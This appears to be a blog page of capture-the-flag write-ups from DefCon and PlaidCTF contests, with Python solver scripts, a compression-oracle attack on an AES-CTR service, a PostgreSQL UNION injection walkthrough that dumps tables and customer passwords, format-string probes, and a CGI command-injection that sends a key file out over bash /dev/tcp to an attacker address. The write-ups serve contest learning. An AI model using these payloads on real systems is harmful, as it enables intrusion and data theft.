0

DefCon CtF Quals 2014 writeup – hackertool

-

hey, we need to check that your connection works, torrent this file and md5 it

http://services.2014.shallweplayaga.me/hackertool.torrent_fe3b8b75e9639d35e8ac1d9809726ee2

The torrent file when loaded into Vuze showed that the file name was every_ip_address.txt. So I downloaded some of the file and observed the format. The format of the file was “0.0.0.1\n0.0.0.2\n…. “.

So I wrote a quick python script to calculate the md5:

#!/bin/python
import hashlib
m = hashlib.md5()
fsize = 0
a = ''
for i in xrange(256):
    for j in xrange(256):
        for k in xrange(256):
            for l in xrange(256):
                a = str(i)+'.'+str(j)+'.'+str(k)+'.'+str(l)+'\n'
                fsize += len(a)
                m.update( a )
print m.hexdigest()

The flag was “1a97f624cc74e4944350c04f5ae1fe8d”.

0

PlaidCTF 2013 – Crypto 250 Compression Writeup

-

On the recently concluded PlaidCTF (which was an awesome competition) by PPP there was a problem.  Here it goes:

Question: We managed to get the source code for an encryption service running at 54.234.224.216:4433.

I have listed the python source provided below:

#!/usr/bin/python
import os
import struct
import SocketServer
import zlib
from Crypto.Cipher import AES
from Crypto.Util import Counter

# Not the real keys!
ENCRYPT_KEY = '0000000000000000000000000000000000000000000000000000000000000000'.decode('hex')
# Determine this key.
# Character set: lowercase letters and underscore
PROBLEM_KEY = 'XXXXXXXXXXXXXXXXXXXX'

def encrypt(data, ctr):
    aes = AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr)
    return aes.encrypt(zlib.compress(data))

class ProblemHandler(SocketServer.StreamRequestHandler):
    def handle(self):
        nonce = os.urandom(8)
        self.wfile.write(nonce)
        ctr = Counter.new(64, prefix=nonce)
        while True:
            data = self.rfile.read(4)
            if not data:
                break

            try:
                length = struct.unpack('I', data)[0]
                if length > (1<<20):
                    break
                data = self.rfile.read(length)
                data += PROBLEM_KEY
                ciphertext = encrypt(data, ctr)
                self.wfile.write(struct.pack('I', len(ciphertext)))
                self.wfile.write(ciphertext)
            except:
                break

class ReusableTCPServer(SocketServer.ForkingMixIn, SocketServer.TCPServer):
    allow_reuse_address = True

if __name__ == '__main__':
    HOST = '0.0.0.0'
    PORT = 4433
    SocketServer.TCPServer.allow_reuse_address = True
    server = ReusableTCPServer((HOST, PORT), ProblemHandler)
    server.serve_forever()

The key on this challenge is to see that the stream encryption is being done on the compressed input. In the source provided, if the user input is similar to the secret value in the PROBLEM_DATA variable then the zlib.compress() function would show a reduced length ciphertext. This is somewhat (and I use the term loosely) similar to the CRIME vulnerability. The AES Counter mode RFC has the implementation details of the cipher. So I wrote the following script.

import socket
import sys
from itertools import *
import struct
def display(msg,numbytes):
	#print >>sys.stderr, 'received "%s"' % msg
	#print >>sys.stderr, 'bytes "%d"' % numbytes
	print >>sys.stderr, 'bytes %d ' % numbytes + msg.encode('hex')
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = ('54.234.224.216', 4433)
print >>sys.stderr, 'connecting to %s port %s' % server_address
sock.connect(server_address)
#mesage len = 20 lowercase and underscore letters
try:
	amount_received = 0
	nonce = sock.recv(8)
	amount_received += len(nonce)
	# Send data
	#strng = 'crime_some'
	#minciphlen = 1000
	#strng = 'crimes_pays'
	#strng = 'so_'
	#strng = 'crime_some_times_pays'
	#strng = 'somet_'
	strng = 'cr'
	minchar = ''
	ciphlen = 1000
	sampleset = 'hijklmnopqrstuvwxyz_abdefgc'
	#while True:
	strng = strng + minchar	
	minciphlen = ciphlen
	minchar = ''
	for s in map("".join,permutations(sampleset,1)):
		#message = nonce +  (strng + s)*10  #'\x00'*11 + s
		message = strng + s
		datalen = struct.pack('I',len(message))  # datalen = '\xe4\x00\x00\x00'
		sock.sendall(datalen)
		#print >>sys.stderr, 'sending '+ message
		sock.sendall(message)
		#print >>sys.stderr, 'message sent'
		amount_received = 0
		# Look for the response
		data = sock.recv(4)
		amount_received += len(data)
		ciphlen = struct.unpack('I', data)[0]
		#print >>sys.stderr, message + ' ' 
		amount_received = 0
		if ciphlen <= minciphlen:
			minciphlen = ciphlen
			minchar = s
			print str(ciphlen) + ' It is ' + strng + minchar
		data = sock.recv(ciphlen)
		#display(data,ciphlen)		
finally:
    print >>sys.stderr, 'closing socket'
    sock.close()

When you connect to the service it provides you the nonce, so I prepended the nonce to the plaintext. The above script shows the plaintext and the length of the cipher text. To start off with this, you start with a string of length 1, and see which is the smallest length response, that gives your first character. Then in the

strng

variable above, you add that character and run again, and the lowest length ciphertext tells you the next character and so on. I noticed that sometimes the output had a few characters with the lowest length. So I tried each of them and ended up with the following flag:

crime_sometimes_pays 
0

DefCon CTF Quals GrabBag 300 Writeup

-

The question was:
Question: This is semi-real. 🙁
140.197.217.85:10435
Password: 5fd78efc6620f6

When you would connect using netcat you would see a 9 numbers and a user PIN. This would repeat thrice and then you would have to choose the right pin for the fourth pair 6×6 matrix of numbers. My first reaction was either the PINS were constant or they were following a pattern. So I wrote up this quick python script to solve this puzzle which helped me understand the problem also.

#!/usr/bin/python
import socket, re, threading, time
 
lookupdict = []

def process_array_pin(fs,s):
	i = 6
	temp = ''
	pin = ''
	while i > 0:
		line = fs.readline()
		#print line
		#re.match(".{11}(.).{12}(.).{12}(.)", line).group(1)
		test = re.split(' ',line)
		#print test[1],' ',test[3],' ',test[5],' ',test[7],' ',test[9],' ',test[11]
		i = i - 1
		try:
			temp += test[1]+test[3]+test[5]+test[7]+test[9]+test[11]
		except IndexError:
			pass
			#i = 15
			#while i > 0:
			#	print fs.readline()
			#	i = i - 1
			#s.send('2\n')
			#i = 15
			#while i > 0:
			#	print fs.readline()
			#	i = i - 1
	line = fs.readline()
	try:
		pin = re.match("..........User entered: (.*)", line).group(1)
	except:
		pass
	#pin = fs.readline()
	#print 'Line: '+line
	#print 'Pin is : '+pin
	strpin = re.sub(' ','',pin)
	#strpin = re.split(' ',pin)
	#lookupdict[temp] = strpin
	print 'Pin for : ' + temp+' is '+strpin+'\n'
	return temp,strpin
def play():
	global fs, s
	s = socket.create_connection(('140.197.217.85', 10435))
	fs = s.makefile()
	s.send('5fd78efc6620f6\n')
	print fs.readline()
	print fs.readline()
	print fs.readline()
	answer = []
	numTimes = 0
	while numTimes < 5:
		j = 3
		while j > 0:
			test = process_array_pin(fs,s)
			lookupdict.append(test[0])
			lookupdict.append(test[1])
			j = j - 1
			if j > 0:
				numlines = 3
				while numlines > 0:
					fs.readline()
					numlines = numlines - 1
		fs.readline()
		pindigits = list(lookupdict[1])
		#print pindigits
		pinpos = 0
		for num in pindigits:
			i = 0
			start = 0
			end = len(lookupdict[0])
			while i < lookupdict[0].count(num):
				indofinterest = lookupdict[0].find(num,start,end)
				#print 'index of interest '+str(indofinterest)
				if lookupdict[2][indofinterest] == lookupdict[3][pinpos]:
					if lookupdict[4][indofinterest] == lookupdict[5][pinpos]:
						answer.append(indofinterest)
						break
				i = i + 1
				start = indofinterest+1
			pinpos = pinpos + 1
		#print answer
		# Get question
		i = 6
		temp1 = ""
		while i > 0:
			line = fs.readline()
			#print line
			#re.match(".{11}(.).{12}(.).{12}(.)", line).group(1)
			test = re.split(' ',line)
			#print test[1],' ',test[3],' ',test[5],' ',test[7],' ',test[9],' ',test[11]
			temp1 += test[1]+test[3]+test[5]+test[7]+test[9]+test[11]
			i = i - 1
		#fs.read(14)
		#fs.flush()
		print "Question : " +temp1+'\n'
		answerstr = ''
		count = 0
		for i in answer:
			answerstr += temp1[i]
			#print temp1[i],
			count = count + 1
			if count < 4:
				answerstr += ' '
			else:
				answerstr += '\n'
		print "Answer : "+answerstr
		s.send(answerstr)
		output = fs.readline()
		#output = fs.readline()
		print output
		if output.find('Sun') > -1:
			output = fs.readline()
		else:
			a = 10
			while a > 0:
				print fs.readline()
				a = a - 1
			#output = fs.readline()
			#print 'Inside else\n'
			#if output.find('NOVA') > -1:
			#	print 'NOVAFOUND!!!!!\n'
			s.send('2\n')
			print 'Sent last\n'
			a = 100
			while a > 0:
				print fs.readline()
				s.send('%d%n\n')
				a = a - 1
			#print fs.readline()
			break
		del answer[:]
		del lookupdict[:]
		del pindigits[:]
		numTimes += 1
	
	s.close()
#for i in range(2000):
#threading.Thread(target=play).start()
play()

The above file reads the numbers, filters out the formatting that adds color to the digits and picks out the indices that would be chosen as the key.

So to solve this, each pattern of digits had fixed matrix positions that would be chosen as the pin. Once you successfully solve the puzzle four time you are presented with an ATM screen as follows:

 ***NOVABANK ATM menu***

 Balance: $9238740982570237012935.32

 1) withdraw
 2) deposit
 3) transfer
 4) exit

 <disconnected>

The real part is the balance i.e., 9238740982570237012935.32 is the answer. It took me various attempts to solve this one because the answer was for some reason not being accepted by the scoreboard until my teammate submitted it at which time it worked.

This was a really cool problem. Thanks DDTEK.

2

DefCon CTF Quals GrabBag400 Writeup

-

This was an interesting PostgreSQL injection challenge.
What is Jeff Moss’ checking account balance?
Bank Site – http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep

The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you

SQL injection in zip parameter. http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0

List of databases can be found by: http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0

Names of databases
——————
template1
template0
postgres
boa_bank

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20relname,A.attname,relname,A.attname,1,relname%20FROM%20pg_class%20C,pg_namespace%20N,pg_attribute%20A,pg_type%20T%20WHERE%20(C.relkind=’r’)%20AND%20(N.oid=C.relnamespace)%20AND%20(A.attrelid=C.oid)%20AND%20(A.atttypid=T.oid)%20AND%20(A.attnum%3E0)%20AND%20(NOT%20A.attisdropped)%20AND%20(N.nspname%20ILIKE%20’public’)&Submit.x=0&Submit.y=0

With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”.

Table,column_name
—————–
transaction,amount
transaction,account
transaction,id
transaction,date
branch,id
branch,zip
branch,city
branch,name
branch,street
branch,phone
branch,state
customer,id
customer,firstname
customer,password
customer,lastname
customer,username
customer,email
account,id -> int
account,owner -> int
account,account -> string
account,balance
account,type -> checking/savings
sqlmapfile,data
test2234,t
hkk,t
mydata,t
mytable,mycol
hk,hk
sonic,sonic

Getting all customers (Jeff Moss can’t be found in the list though)
http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
Lots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!!

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20A.account,A.type,A.type,cast(A.balance%20as%20text),A.owner,A.account%20FROM%20account%20A%20where%20A.type%20ILIKE%20’checking’&Submit.x=0&Submit.y=0

Fun times!

3

Plaid CtF 2011 – Writeup #16

-

The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.

My writeup for #16 – Plain sight [200 pts] web

The problem was

The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.
The good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes
installed.

Find what AED is hiding, good luck and godspeed.

There was a URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi that allowed remote code execution.
bash, cat, less, more, ls were allowed.

First thing I did was checked if the bash TCP connections were allowed using:
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000

That seemed to work. So then I listed the directories one by one until I bumped onto:
I used http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000 I had the port forwarded to my PC and a netcat listener running in a loop
while [ 1 ]
do
nc -l -v -p 5000
done

The answer was esc4p3_str1ng5.

Fun times!